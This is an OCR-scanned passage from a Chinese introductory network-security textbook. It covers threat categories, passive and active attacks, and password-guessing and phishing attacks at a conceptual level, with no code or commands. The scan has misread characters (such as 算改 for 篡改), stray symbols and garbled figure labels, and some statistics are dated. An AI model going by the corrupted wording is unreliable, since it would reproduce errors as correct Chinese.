第 二 次 变革 。 人 们 通过 各 种 通信 网 络 进行 数据 的 传输 、 交 换 、 存 储 、 共 享 和 分 布 式 计算 。 
网 络 的 出 现 给 人 们 的 工作 和 生活 带 来 了 极 大 的 便利 ,但 同时 也 带 来 了 极 大 的 安全 风险 。 
在 信息 传输 和 交换 时 ,需要 对 通信 信道 上 传输 的 机 密 数据 进行 加 密 ; 在 数据 存储 和 共享 
时 ,需要 对 数据 库 进 行 安全 的 访问 控制 和 对 访问 者 授权 ;在 进行 多 方 计算 时 ,需要 保证 各 
方 机 密 信息 不 被 泄露 。 这 些 均 属于 网 络 安全 的 范畴 。 


1. 网 络 安全 现状 

在 今天 的 计算 机 技术 产业 中 ,网 络 安全 是 急需 解决 的 最 重要 的 问题 之 一 。 由 美国 律 
师 联合 会 (American Bar Association) 所 做 的 一 项 与 安全 有 关 的 调查 发 现 ,有 40% 的 被 调 
查 者 承认 在 他 们 的 机 构 内 曾经 发 生 过 计算 机 犯罪 事件 。 在 过 去 的 几 年 里 ,Internet 继续 
快速 发 展 ,Internet 用 户 数量 急剧 攀升 。 随 着 网 络 基础 设施 的 建设 和 Internet 用 户 的 激 
增 , 网 络 与 信息 安全 问题 越 来 越 严 重 , 因 黑客 事件 而 造成 的 损失 也 越 来 越 巨大 。 

第 一 ,计算 机 病毒 层出不穷 ,肆虐 全 球 ,并 且 逐 渐 呈 现 新 的 传播 态势 和 特点 。 其 主要 
表现 是 传播 速度 快 ,与 黑客 技术 结合 在 一 起 而 形成 的 “ 混 种 病毒 "和 "变异 病毒 " 越 来 越 多 。 
病毒 能 够 自我 复制 ,主动 攻击 与 主动 感染 能 力 增强 。 当 前 ,全 球 计算 机 病毒 已 达 8 万 多 
种 ,每 天 会 产生 5 一 10 种 新 病毒 。 

第 二 ,黑客 对 全 球 网 络 的 恶意 攻击 势头 逐年 攀升 。 近 年 来 ,网 络 攻击 还 呈现 出 黑客 技 
术 与 病毒 传播 相 结合 的 趋势 。2001 年 以 来 ,计算 机 病毒 的 大 规模 传播 与 破坏 都 同 黑客 技 
术 的 发 展 有 关 , 二 者 的 结合 使 病毒 的 传染 力 与 破坏 性 倍增 。 这 意味 着 网 络 安全 遇 到 了 新 
的 挑战 , 即 集 病毒 、 木 马 . 蠕 虫 和 网 络 攻击 为 一 体 的 威胁 :可 能 造成 快速 ,大 规模 的 感染 , 造 
成 主机 或 服务 器 瘫痪 ,数据 信息 丢失 ,损失 不 可 估量 。 在 网 络 和 无 线 电 通信 普及 的 情况 
下 ,尤其 是 在 计算 机 网 络 与 无 线 通 信和 融合 、 国 家 信息 基础 设施 网 络 化 的 情况 下 ,黑客 加 病 
毒 的 攻击 很 可 能 构成 对 网 络 生 存 与 运行 的 致命 威胁 。 如 果 黑 客 对 国家 信息 基础 设施 中 的 


任何 一 处 目标 发 起 攻击 ,都 可 能 导致 巨大 的 经 济 损失 。 

第 三 ,由 于 技术 和 设计 上 的 不 完备 ,导致 系统 存在 缺陷 或 安全 漏洞 。 这 些 漏洞 或 缺陷 
主要 存在 于 计算 机 操作 系统 与 网 络 软 件 之 中 。 例 如 ,微软 的 Windows XP 操作 系统 中 含 
有 数 项 严重 的 安全 漏洞 ,黑客 可 以 透 过 此 漏洞 实施 网 络 窃取 、 销 毁 用 户 资料 或 擅自 安装 软 
件 , 乃 至 控制 用 户 的 整个 计算 机 系统 。 正 是 因为 计算 机 操作 系统 与 网 络 软 件 难 以 完全 克 
服 这 些 漏洞 和 缺陷 ,使 得 病毒 和 黑客 有 了 可 乘 之 机 。 由 于 操作 系统 和 应 用 软件 所 采用 的 
技术 越 来 越 先进 和 复杂 ,因此 带 来 的 安全 问题 就 越 来 越 多 。 同 时 ,由 于 黑客 工具 随手 可 
得 ,使 得 网 络 安全 问题 越 来 越 严重 。 所 谓 “ 网 络 是 安全 的 ”说 法 只 是 相对 的 ,根本 无 法 达到 
“绝对 安全 ”的 状态 。 

第 四 ,世界 各 国 军 方 都 在 加 紧 进行 信息 战 的 研究 。 近 几 年 来 ,黑客 技术 已 经 不 再 局 限 
于 修改 网 页 .删除 数据 等 惯用 的 伎俩 ,而 是 登 上 了 信息 战 的 舞台 ,成 为 信息 作战 的 一 种 手 
段 。 信 息 战 的 威力 之 大 ,在 某 种 程度 上 不 亚 于 核武 器 。 在 海湾 战争 .科索沃 战争 及 巴 以 战 
争 中 ,信息 战 发 挥 了 巨大 的 威力 。 

今天 ,“ 制 信息 权 ” 已 经 成 为 衡量 一 个 国家 实力 的 重要 标志 之 一 。 信 息 空间 上 的 信息 
大 战 正 在 悄悄 而 积极 地 酝酿 ,小 规模 的 信息 战 一 直 不 断 出 现 、 发 展 和 扩大 。 信 息 战 是 信息 
化 社会 发 展 的 必然 产物 。 在 信息 战场 上 能 否 取 得 控制 权 , 是 赢得 政治 外交、 军事 和 经 济 
斗争 胜利 的 先决 条 件 。 信 息 安 全 问题 已 成 为 影响 社会 稳定 和 国家 安危 的 战略 性 问题 。 


2. 敏感 信息 对 安全 的 需求 

与 传统 的 邮政 业务 和 有 纸 办 公 不 同 ,现代 的 信息 传递 .存储 与 交换 是 通过 电子 和 光子 
完成 的 。 现 代 通 信 系统 可 以 让 人 类 实现 面对面 的 电视 会 议 或 电话 通信 。 然 而 , 流 过 信息 
系统 的 信息 有 可 能 十 分 敏感 ,因为 它们 可 能 涉及 产权 信息 ,政府 或 企业 的 机 密 信息 ,或 者 
与 企业 之 间 的 竞争 密切 相关 。 目 前 ,许多 机 构 已 经 明确 规定 ,对 网 络 上 传输 的 所 有 信息 必 
须 进行 加 密 保护 。 从 这 个 意义 上 讲 ,必须 对 数据 保护 、 安 全 标准 与 策略 的 制定 、 安 全 措施 
的 实际 应 用 等 各 方面 工作 进行 全 面 的 规划 和 部 署 。 

根据 多 级 安全 模型 ,通常 将 信息 的 密级 由 低 到 高 划分 为 秘密 级 、 机 密级 和 绝密 级 ,以 
确保 每 一 密级 的 信息 仅 能 让 那些 具有 高 于 或 等 于 该 权限 的 人 使 用 。 所 谓 机 密 信息 和 绝密 
信息 ,是 指 国 家 政府 对 军事 、 经 济 、 外 交 等 领域 严 加 控制 的 一 类 信息 。 军 事 机 构 和 国家 政 
府 部 门 应 特别 重视 对 信息 施加 严格 的 保护 ,特别 应 对 那些 机 密 和 绝密 信息 施加 严格 的 保 
护 措施 。 对 于 那些 被 认为 敏感 但 非 机 密 的 信息 ,也 需要 通过 法 律 手段 和 技术 手段 加 以 保 
护 , 以 防止 信息 泄露 或 被 恶意 修改 。 事实 上 ,一 些 政府 部 门 的 信息 虽然 是 非 机 密 的 ,但 它 
们 通常 属于 敏感 信息 。 一 旦 泄露 这 些 信息 ,有 可 能 对 社会 的 稳定 造成 危害 。 因 此 ,不 能 通 
过 未 加 保护 的 通信 媒介 传送 此 类 信息 ,而 应 该 在 发 送 前 或 发 送 过 程 中 对 此 类 信息 进行 加 
密 保 护 。 当 然 , 这 些 保 护 措施 的 实施 是 要 付出 代价 的 。 除 此 之 外 ,在 系统 的 方案 设计 、 系 
统管 理 和 系统 的 维护 方面 还 需要 花费 额外 的 时 间 和 精力 。 近 年 来 ,一 些 采 用 极 强 防护 措 
施 的 部 门 也 面临 着 越 来 越 严重 的 安全 威胁 。 今 天 的 信息 系统 不 再 是 一 个 孤立 的 系统 , 通 
信和 网 络 已 经 将 无 数 个 独立 的 系统 连接 在 一 起 。 在 这 种 情况 下 ,网络 安全 也 呈现 出 许多 新 
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3. 网 络 应 用 对 安全 的 需求 

Internet 从 诞生 到 现在 只 有 短 短 几 十 年 的 时 间 ,但 其 爆炸 式 的 技术 发 展 速度 远 远 超 
过 人 类 历史 上 任何 一 次 技术 革命 。 然 而 ,从 长 远 发 展 趋势 来 看 ,现在 的 Internet 还 处 于 发 
展 的 初级 阶段 ,Internet 技术 存在 着 巨大 的 发 展 空间 和 潜力 。 

随 着 网 络 技术 的 发 展 ,网 络 视 频 会 议 、 远 程 教育 等 各 种 新 型 网 络 多 媒体 应 用 不 断 出 
现 ,传统 的 网 络 体系 结构 越 来 越 显 示 出 局 限 性 。1996 年 ,美国 政府 制定 了 下 一 代 Internet 
(Next Generation Internet,NGI) 计 划 ,与 目前 使 用 的 Internet 相 比 , 它 的 传输 速度 将 更 
快 , 规 模 更 大 ,对 网 络 的 安全 性 提出 了 更 高 的 要 求 。 

当今 ,各 种 网 络 应 用 如 雨 后 春 算 般 不 断 涌现 ,而 这 些 应 用 与 人 们 的 生活 和 工作 息 息 相 
关 , 如 何 保护 这 些 应 用 的 安全 是 一 个 巨大 的 挑战 。 


3.1.2. 网络 安全 威胁 与 防护 措施 


1. 基本 概念 

所 谓 安全 威胁 ,是 指 某 个 人 、 物 事件 或 概念 对 某 一 资源 的 保密 性 、 完 整 性 、 可 用 性 或 
合法 使 用 所 造成 的 危险 。 攻 击 就 是 某 个 安全 威胁 的 具体 实施 。 

所 谓 防护 措施 ,是 指 保护 资源 免 受 威胁 的 一 些 物理 的 控制 .机 制 . 策 略 和 过 程 。 脆 弱 
性 是 指 在 实施 防护 措施 中 或 缺少 防护 措施 时 系统 所 具有 的 弱点 。 

所 谓 风险 ,是 对 某 个 已 知 的 ,可 能 引发 某 种 成 功 攻击 的 脆弱 性 的 代价 的 测度 。 当 某 个 
脆弱 的 资源 的 价值 越 高 且 成 功 攻 击 的 概率 越 大 时 ,风险 就 越 高 ;反之 , 当 某 个 脆弱 资源 的 
价值 越 低 且 成 功 攻 击 的 概率 越 小 时 ,风险 就 越 低 。 风 险 分 析 能 够 提供 定量 的 方法 ,以 确定 
是 否 应 保证 在 防护 措施 方面 的 资金 投入 。 

安全 威胁 有 时 可 以 分 为 故意 (如 黑客 渗透 ) 和 偶然 (如 信息 被 发 往 错 误 的 地 方 ) 两 类 。 
故意 的 威胁 又 可 以 进一步 分 为 被 动 攻击 和 主动 攻击 。 被 动 攻 击 只 对 信息 进行 监听 (如 搭 
线 窃 听 ) ,而 不 对 其 进行 修改 。 主 动 攻击 却 对 信息 进行 故意 的 修改 (如 改动 某 次 金融 会 话 
过 程 中 货币 的 数量 ) 。 总 之 ,被 动 攻击 比 主动 攻击 更 容易 以 更 少 的 花费 付 诸 实施 。 

目前 尚 没有 统一 的 方法 来 对 各 种 威胁 加 以 区 别 和 进行 分 类 ,也 难以 厘清 各 种 威胁 之 
间 的 相互 关系 。 不 同 威胁 的 存在 及 其 严重 性 随 着 环境 的 变化 而 变化 。 为 了 解释 网 络 安全 
服务 的 作用 ,我 们 将 现代 计算 机 网 络 及 通信 过 程 中 常 遇 到 的 一 些 威胁 汇编 成 图 表 ， 
如 图 3-1 和 表 1-1 所 示 。 下 面 分 3 个 阶段 对 威胁 进行 分 析 : 基本 的 威胁 ;@ 主 要 的 可 实 
现 威胁 ;@ 洪 在 威胁 及 分 类 。 


2. 安全 威胁 的 来 源 

(1) 基本 威胁 

在 信息 系统 中 ,存在 以 下 4 种 基本 安全 威胁 : 

COD 信息 泄露 : 信息 被 泄露 或 透露 给 某 个 非 授 权 的 人 或 实体 。 这 种 威胁 来 自 诸如 窃 
听 、 搭 线 或 其 他 更 加 错综复杂 的 信息 探测 攻击 。 

@ 完整 性 破坏 : 数据 的 一 致 性 通过 非 授 权 的 增删 .修改 或 破坏 而 受到 损坏 。 

G 拒绝 服务 : 对 信息 或 资源 的 访问 被 无 条 件 地 阻止 。 这 可 能 由 以 下 攻击 所 致 : 攻击 
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者 通过 对 系统 进行 非法 的 、 根 本 无 法 成 功 的 访问 尝试 使 系统 产生 过 量 的 负荷 ,从 而 导致 系 
统 的 资源 在 合法 用 户 看 来 是 不 可 使 用 的 。 拒 绝 服务 也 可 能 是 因为 系统 在 物理 上 或 逻辑 上 
受到 破坏 而 中 断 服务 。 

@ 非法 使 用 : 某 一 资源 被 某 个 非 授权 的 人 或 以 某 种 非 授权 的 方式 使 用 。 例 如 ,侵入 
某 个 计算 机 系统 的 攻击 者 会 利用 此 系统 作为 次 用 电信 服务 的 基点 ,或 者 作为 侵入 其 他 系 
统 的 “桥头 堡 ”。 

(2) 主要 的 可 实现 威胁 

在 安全 威胁 中 ,主要 的 可 实现 威胁 应 该 引起 高 度 关注 ,因为 这 类 威胁 一 旦 成 功 实施 ， 
就 会 直接 导致 其 他 任何 威胁 的 实施 。 主 要 的 可 实现 威胁 包括 渗入 威胁 和 植 入 威胁 。 

主要 的 渗入 威胁 有 如 下 几 种 : 

CD 假冒 。 某 个 实体 (人 或 系统 ) 假 装 成 另外 一 个 不 同 的 实体 。 这 是 突破 某 一 安全 防 
线 最 常用 的 方法 。 这 个 非 授权 的 实体 提示 某 个 防线 的 守卫 者 ,使 其 相信 它 是 一 个 合法 实 
体 , 此 后 便 抽取 了 此 合法 用 户 的 权利 和 特权 。 黑 客 大 多 采取 这 种 假冒 攻击 方式 来 实施 
攻击 。 

@ 旁 路 控制 。 为 了 获得 非 授权 的 权利 和 特权 , 某 个 攻击 者 会 发 气 系 统 的 缺陷 和 安全 
漏洞 。 例 如 ,攻击 者 通过 各 种 手段 发 现 原 本 应 保密 但 又 暴露 出 来 的 一 些 系统 “特征 ”。 攻 
击 者 可 以 绕 过 防线 守卫 者 侵入 系统 内 部 。 

@ 授权 侵犯 。 一 个 授权 以 特定 目的 使 用 某 个 系统 或 资源 的 人 , 却 将 其 权限 用 于 其 他 
非 授权 的 目的 。 这 种 攻击 的 发 起 者 往往 属于 系统 内 的 某 个 合法 的 用 户 ,因此 这 种 攻击 又 
称 为 “内 部 攻击 ”。 

主要 的 植 和 人 类 型 的 威胁 有 如 下 几 种 : 

CD 特洛伊 木马 (Trojan Horse)。 软 件 中 含有 一 个 不 易 觉察 的 或 无 害 的 程序 段 , 当 被 
执行 时 , 它 会 破坏 用 户 的 安全 性 。 例 如 ,一 个 表面 上 具有 合法 目的 的 应 用 程序 软件 ,如 文 
本 编辑 软件 , 它 还 具有 一 个 暗藏 的 目的 ,就 是 将 用 户 的 文件 复制 到 一 个 隐藏 的 秘密 文件 
中 ,这 种 应 用 程序 就 称 为 特洛伊 木马 。 此 后 , 植 入 特洛伊 木马 的 那个 攻击 者 就 可 以 阅读 到 
该 用 户 的 文件 。 

@ 陷 门 (Trapdoor)。 在 某 个 系统 或 其 部 件 中 设置 机关 ”, 使 在 提供 特定 的 输入 数据 
时 ,允许 违反 安全 策略 。 例 如 ,如 果 在 一 个 用 户 登 录 子 系统 上 设 有 陷 门 , 当 攻击 者 输入 一 
个 特别 的 用 户 身份 号 时 ,就 可 以 绕 过 通常 的 口令 检测 。 

(3) 潜在 威胁 

在 某 个 特定 的 环境 中 ,如 果 对 任何 一 种 基本 威胁 或 主要 的 可 实现 的 威胁 进行 分 析 ,就 
能 够 发 现 某 些 特定 的 潜在 威胁 ,而 任意 一 种 潜在 的 威胁 都 可 能 导致 一 些 更 基本 的 威胁 发 
生 。 例 如 ,在 对 信息 泄露 这 种 基本 威胁 进行 分 析 时 ,有 可 能 找 出 以 下 几 种 潜在 的 威胁 : 

(D 窃听 (Eavesdropping)。 

@ 流量 分 析 (Traffic Analysis) 。 

操作 人 员 的 不 慎 所 导致 的 信息 泄露 。 

@ 媒体 废弃 物 所 导致 的 信息 泄露 。 

图 3-1 列 出 了 一 些 典型 的 威胁 及 它们 之 间 的 相互 关系 。 注 意 ,图 中 的 路 径 可 以 交错 。 
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例如 ,假冒 攻击 可 以 成 为 所 有 基本 威胁 的 基础 ,同时 假冒 攻击 本 身 也 存在 信息 泄露 的 潜在 
威胁 。 信 息 泄露 可 能 暴露 某 个 口令 ,而 用 此 口令 攻击 者 也 可 以 实施 假冒 攻击 。 表 3-1 列 
出 了 各 种 威胁 之 间 的 差异 ,并 分 别 进行 了 描述 。 


信息 泄露 完整 性 破坏 拒绝 服务 | 非法 使 用 
渗入 
假冒 特洛伊 木马 
窃听 旁 路 控制 n 
流量 分 析 授权 侵犯 服务 欺骗 窃取 
电磁 /射频 物理 侵入 
截获 
AUC 
| 媒体 清理 | | 信息 洱 圳 
完整 性 侵犯 
LügkAEE | | 窃取 | | WWE | 
务 否认 消息 重 发 完整 性 侵犯 


图 3-1 典型 的 威胁 及 其 相互 关系 


表 3-1 典型 的 网 络 安全 威胁 


威 M 描述 
授权 侵犯 一 个 被 授权 以 特定 目的 使 用 系统 的 人 , 却 将 此 系统 用 于 其 他 非 授权 的 目的 
旁 路 控制 攻击 者 发 掘 系统 的 安全 缺陷 或 安全 脆弱 性 ,以 绕 过 访问 控制 措施 
拒绝 服务 * 对 信息 或 其 他 资源 的 合法 访问 被 无 条 件 地 拒绝 
窃听 攻击 信息 从 被 监视 的 通信 过 程 中 泄露 出 去 
电磁 /射频 截获 | 信息 从 电子 或 机 电 设备 所 发 出 的 无 线 频率 或 其 他 电磁 场 辐射 中 被 提取 出 来 
非法 使 用 资源 被 某 个 非 授权 的 人 或 以 非 授 权 的 方式 使 用 
人 员 朴 忽 一 个 被 授权 的 人 为 了 金钱 等 利益 或 由 于 粗心 ,将 信息 泄露 给 非 授权 的 人 
信息 泄露 信息 被 泄露 或 暴露 给 某 个 非 授权 的 人 
完整 性 侵犯 * 数据 的 一 致 性 由 于 非 授 权 的 增删 、 修 改 或 破坏 而 受到 损害 
截获 /修改 * 某 一 通信 数据 在 传输 过 程 中 被 改变 ,删除 或 替换 
假冒 攻击 * 一 个 实体 (人 或 系统 ) 假 装 成 另 一 个 不 同 的 实体 
媒体 废弃 物 信息 从 被 废弃 的 磁带 或 打印 的 废 纸 中 泄露 出 去 
物理 入侵 人 侵 者 通过 绕 过 物理 控制 (如 防盗 门 ) 而 获得 对 系统 的 访问 
消息 重 发 * 对 所 截获 的 某 次 合法 通信 数据 备份 .出 于 非法 的 目的 而 重新 发 送 该 数据 
业务 否认 * 参与 某 次 通信 交换 的 一 方 .事后 错误 地 否认 曾经 发 生 过 此 次 信息 交换 
资源 耗 尽 某 一 资源 (如 访问 接口 ) 被 故意 地 超 负 荷 使 用 ,导致 其 他 用 户 服务 中 断 
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续 表 
AO M d 述 
服务 欺骗 某 一 伪造 的 系统 或 部 件 欺骗 合法 的 用 户 或 系统 ,自愿 放弃 敏感 的 信息 
窃取 某 一 安全 依 关 的 物品 被 盗 ,例如 令 牌 或 身份 卡 
流量 分 析 * 通过 对 通信 流量 的 模式 进行 观察 ,机密 信息 有 可 能 泄露 给 非 授 权 的 实体 
陷 门 将 某 一 “特征 ”嵌入 某 个 系统 或 其 部 件 中 , 当 输入 特定 数据 时 ,允许 违反 安全 策略 
特洛伊 木马 一 个 不 易 察 觉 或 无 害 程 序 段 的 软件 , 当 其 被 运行 时 ,就 会 破坏 用 户 的 安全 性 


说 明 : 带 * 的 威胁 表示 在 计算 机 通信 安全 中 可 能 发 生 的 威胁 。 


对 3000 种 以 上 的 计算 机 误 用 案例 所 做 的 一 次 抽样 调查 显示 ,最 主要 的 几 种 安全 威胁 
如 下 (按照 出 现 频率 由 高 至 低 排列 ): 四 授权 侵犯 。 四 假冒 攻击 。 四 旁 路 控制 。 四 特洛伊 
木马 或 陷 门 。 回 媒体 废弃 物 。 

在 Internet 中 ,网 络 蠕虫 (Internet Worm) 就 是 将 旁 路 控制 与 假冒 攻击 结合 起 来 的 一 
种 威胁 。 旁 路 控制 就 是 利用 已 知 的 UNIX. Windows 和 Linux 等 操作 系统 的 安全 缺陷 ， 
避 开 系统 的 访问 控制 措施 ,进入 系统 内 部 。 而 假冒 攻击 则 通过 破译 或 窃取 用 户口 令 ,冒充 
合法 用 户 使 用 网 络 服务 和 资源 。 


安全 防护 措 
安全 领域 中 ， E red. 除了 采用 密码 技术 的 防护 措施 外 ,还 有 其 
seo 

(D 物理 安全 。 包 括 门 锁 或 其 他 物理 访问 控制 措施 、 敏 感 设备 的 防 自 改 和 环境 控 
制 等 。 

@ 人 员 安 全 。 包 括 对 工作 岗位 敏感 性 的 划分 .雇员 的 筛选 ,同时 也 包括 对 人 员 的 安 
全 性 培训 ,以 增强 其 安全 意识 。 

@ 管理 安全 。 包 括 对 进口 软件 和 硬件 设备 的 控制 ,负责 调查 安全 泄露 事件 ,对 犯罪 
分 子 进行 审计 跟踪 ,并 追查 安全 责任 。 

@ 媒体 安全 。 包 括 对 受 保护 的 信息 进行 存储 ,控制 敏感 信息 的 记录 、 再 生 和 销毁 , 确 
保 废 弃 的 纸张 或 含有 敏感 信息 的 磁性 介质 被 安全 销毁 。 同 时 .对 所 用 媒体 进行 扫描 ;以便 
发 现 病毒 。 

G) 辆 射 安全 。 对 射频 (RF) 及 其 他 电磁 (EM) 辐 射 进行 控制 (又 称 TEMPEST 保护 ) 。 

@ 生命 周期 控制 。 包 括 对 可 信 系 统 进行 系统 设计 、 工 程 实施 、 安 全 评估 及 提供 担保 ， 
并 对 程序 的 设计 标准 和 日 志 记 录 进 行 控制 。 

一 个 安全 系统 的 强度 与 其 最 弱 链 路 的 强度 相同 。 为 了 提供 有 效 的 安全 性 ,需要 将 不 
同 种 类 的 威胁 对 抗 措施 联合 起 来 使 用 。 例 如 , 当 用 户 将 口令 遗忘 在 某 个 不 安全 的 地 方 或 
受到 欺骗 而 将 口令 暴露 给 某 个 未 知 的 电话 用 户 时 ,即使 技术 上 是 完备 的 ,用 于 对 付 假冒 攻 
击 的 口令 系统 也 将 无 效 。 

防护 措施 可 用 来 对 付 大 多 数 安全 威胁 ,但 是 采用 每 种 防护 措施 均 要 付出 代价 。 网 络 
用 户 需要 认真 考虑 这 样 一 个 问题 : 为 了 防止 某 个 攻击 所 付出 的 代价 是 否 值得 。 例 如 ,在 
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商业 网 络 中 ,一 般 不 考虑 对 付 电磁 (EM) 或 射频 (RF) 泄 露 , 因 为 它们 对 商用 环境 来 说 风险 
很 小 ,而 且 其 防护 措施 又 十 分 昂贵 。 但 在 机 密 环境 中 ,我 们 会 得 出 不 同 的 结论 。 对 于 某 一 
特定 的 网 络 环境 ,究竟 采用 什么 安全 防护 措施 ,这 种 决策 属于 风险 管理 的 范畴 。 目 前 ,人 
们 已 经 开发 出 各 种 定性 和 定量 的 风险 管理 工具 。 如 果 要 进一步 了 解 有 关 的 信息 ,请 参看 
有 关 文 献 。 


3.1.3 安全 攻击 的 分 类 及 常见 形式 


X.800 和 RFC 2828 对 安全 攻击 进行 了 分 类 。 它 们 把 攻击 分 成 两 类 : 被 动 攻击 和 主 
的 分 类 及 ” 动 攻击 。 被 动 攻击 试图 获得 或 利用 系统 的 信息 ,但 不 会 对 系统 的 资源 造成 破坏 。 而 主动 
常见 形式 ”攻击 则 不 同 , 它 试图 破坏 系统 的 资源 ,影响 系统 的 正常 工作 。 

1. 被 动 攻 击 

被 动 攻 击 的 特性 是 对 所 传输 的 信息 进行 窃听 和 监测 。 攻 击 者 的 目标 是 获得 线路 上 所 
传输 的 信息 。 信 息 泄露 和 流量 分 析 就 是 两 种 被 动 攻击 的 例子 。 

第 一 种 被 动 攻击 是 窃听 攻击 ,如 图 3-2(a) 所 示 。 电 话 、 电 子 邮 件 和 传输 的 文件 中 都 可 
能 含有 敏感 或 秘密 信息 。 攻 击 者 通过 窍 听 , 可 以 截获 这 些 敏 感 或 秘密 信息 。 我 们 要 做 的 
工作 就 是 阻止 攻击 者 获得 这 些 信息 。 


Darth 
阅读 从 Bob 到 Alice 的 消息 内 容 


Alice 


Alice 


(b) 流量 分 析 
3-2 ”被 动 攻击 


第 二 种 被 动 攻 击 是 流量 分 析 , 如 图 3-2(b) 所 示 。 假 设 已 经 采取 了 某 种 措施 来 隐藏 消 
息 内 容 或 其 他 信息 的 流量 ,使 攻击 者 即使 捕获 了 消息 也 不 能 从 中 发 现 有 价值 的 信息 。 加 
密 是 隐藏 消息 的 常用 方法 。 即 使 对 信息 进行 了 合理 的 加 密 保 护 ,攻击 者 仍然 可 以 通过 流 
量 分 析 获 得 这 些 消 息 的 模式 。 攻 击 者 可 以 确定 通信 主机 的 身份 及 其 所 处 的 位 置 ,可 以 观 
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察 传输 消息 的 频率 和 长 度 , 然 后 根据 所 获得 的 这 些 信息 推断 本 次 通信 的 性 
被 动 攻击 由 于 不 涉及 对 数据 的 更 改 , 所 以 很 难 被 察觉 。 通 过 采用 加 密 措施 ,完全 有 可 
能 阻止 这 种 攻击 。 因 此 ,处 理 被 动 攻击 的 重点 是 预防 ,而 不 是 检测 。 


2. 主动 攻击 

主动 攻击 是 指 恶意 算 改 数据 流 或 伪造 数据 流 等 攻击 行为 ,分 成 4 类 : 

(D 伪装 攻击 (Impersonation Attack) ; 

Q 重 放 攻击 (Replay Attack); 

@ 消息 算 改 (Message Modification) ; 

CD 拒绝 服务 (Denial of Service) 攻 击 。 

伪装 攻击 是 指 某 个 实体 假装 成 其 他 实体 ,对 目标 发 起 攻击 ,如 图 3-3(a) 所 示 。 伪 装 攻 
击 的 典型 例子 : 攻击 者 捕获 认证 信息 ,然后 将 其 重 发 ,这 样 攻击 者 就 有 可 能 获得 其 他 实体 
所 拥有 的 访问 权限 。 

重 放 攻 击 是 指 攻 击 者 为 了 达到 某 种 目的 ,将 获得 的 信息 再 次 发 送 , 以 在 非 授 权 的 情况 
下 进行 传输 ,如 图 3-3(b) 所 示 。 

消息 算 改 是 指 攻击 者 对 所 获得 的 合法 消息 中 的 一 部 分 进行 修改 或 延迟 消息 的 传输 ， 
以 达到 其 非 授权 的 目的 ,如 图 3-3(c) 所 示 。 例 如 ,攻击 者 将 消息 *Allow John Smith to 
read confidential accounts” 修 改 为 "Allow Fred Brown to read confidential file accounts", 

拒绝 服务 攻击 则 是 指 阻 止 或 禁止 人 们 正常 使 用 网 络 服务 或 管理 通信 设备 ,如 图 3-3 C0 
所 示 。 这 种 攻击 可 能 目标 非常 明确 。 例 如 , 某 个 实体 可 能 会 禁止 所 有 发 往 某 个 目的 地 的 
消息 。 拒 绝 服务 的 另 一 种 形式 是 破坏 某 个 网 络 ,使 其 瘫痪 ,或 者 使 其 过 载 以 降低 性 能 。 

主动 攻击 与 被 动 攻击 相反 。 被 动 攻击 虽然 难以 检测 ,但 采取 某 些 安全 防护 措施 就 可 
以 有 效 阻 止 ;主动 攻击 虽然 易于 检测 ,但 却 难以 阻止 。 所 以 对 付 主动 攻击 的 重点 应 当 放 在 
如 何 检测 并 发 现 上 ,并 采取 相应 的 应 急 响应 措施 ,使 系统 从 故障 状态 恢复 到 正常 运行 。 由 
于 检测 主动 攻击 对 于 攻击 者 来 说 能 起 到 威慑 作用 ,所 以 在 某 种 程度 上 可 以 阻止 主动 攻击 。 


3. 网 络 攻击 的 常见 形式 

在 前 面 已 经 讨论 了 网 络 中 存在 的 各 种 威胁 ,这 些 威胁 的 直接 表现 形式 就 是 黑客 常 采 
取 的 各 种 网 络 攻击 方式 。 下 面 将 对 常见 的 网 络 攻 击 进行 分 类 。 通 过 分 类 ,可 以 针对 不 同 
的 攻击 类 型 采取 相应 的 安全 防护 措施 。 

(D 口令 窃取 

进入 一 台 计算 机 最 容易 的 方法 就 是 采用 口令 登录 。 只 要 在 许可 的 登录 次 数 范围 内 输 
入 正确 的 口令 ,就 可 以 成 功 地 登录 系统 。 

口令 猜测 攻击 有 三 种 基本 方式 : 

QD 利用 已 知 或 假定 的 口令 尝试 登录 。 虽然 这 种 登录 尝试 需要 反复 进行 十 几 次 甚至 
更 多 ,但 往往 会 取得 成 功 。 一旦 攻击 者 成 功 登录 ,网 络 的 主要 防线 就 会 衣 演 。 很 少 有 操作 
系统 能 够 抵御 从 内 部 发 起 的 攻击 。 

@ 根据 窃取 的 口令 文件 进行 猜测 (如 UNIX 系统 中 的 /etc/passwd 文件 )。 这 些 口令 
文件 有 的 是 从 已 经 被 攻破 的 系统 中 窃取 的 ,有 的 是 从 未 被 攻破 的 系统 中 获得 的 。 由 于 用 

103 


网 络 空间 安全 导论 


Darth 来自 Darth 的 消息 ， 但 


看 上 去 好 像 来 自 Bob 
- c». Hg 
e Tntemet 或 其 他 通信 设施 
Bob Alice 
(a) 伪装 攻击 
Darth 截获 从 Bob 到 Alice 的 消息 ， 


以 后 再 重 放 给 Alice 


gp 7 — 
Internet 或 其 他 通信 设施 
Alice 
(b) 重 放 攻击 


Darth Darth 修 改 从 Bob 到 Alice 


的 消息 
y — 
nternet 或 其 他 通信 设施 


(c) 消息 臭 改 


Alice 


Darth Darth 破 坏 由 服务 器 
提供 的 服务 


Internet 或 其 他 通信 设施 El 


Server 
(d) 拒绝 服务 攻击 
图 3-3 主动 攻击 


户 习惯 重复 使 用 同一 口令 , 当 黑 客 得 到 这 些 文件 后 ,就 会 尝试 用 其 登录 其 他 机 器 。 这 种 攻 
击 称 为 “字典 攻击 ”, 通 常 十 分 奏效 。 

@ 窃听 某 次 合法 终端 之 间 的 会 话 ,并 记录 所 使 用 的 口令 。 采 用 这 种 方式 ,不 管用 户 
的 口令 设计 得 有 多 好 ,其 系统 都 会 遭 到 破坏 。 

要 彻底 解决 使 用 口令 的 弊端 ,就 要 完全 放弃 使 用 口令 机 制 , 转 而 使 用 基于 令 牌 
(Token-based) 的 机 制 。 如 果 和 暂时 还 不 能 做 到 ,起 码 要 使 用 一 次 性 口令 方案 ,如 OTP 
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(One-Time Password) 。 

(2) 欺骗 攻击 

黑客 的 另外 一 种 攻击 方式 是 采用 欺骗 的 方式 获取 登录 权限 。 常 用 的 欺骗 攻击 是 攻击 
者 会 向 受害 者 发 送 钓 鱼 邮件 。 钓 鱼 邮 件 指 利用 伪装 的 电邮 ,欺骗 收 件 人 将 账号 .口令 等 信 
息 回复 给 指定 的 接收 者 ;或 引导 收 件 人 连接 到 特制 的 网 页 ,这 些 网 页 通常 会 伪装 成 和 真实 
网 站 一 样 ,如 银行 或 理财 的 网 页 , 令 登 录 者 信以为真 ,输入 信用 卡 或 银行 卡号 码 、 账 户 名 称 
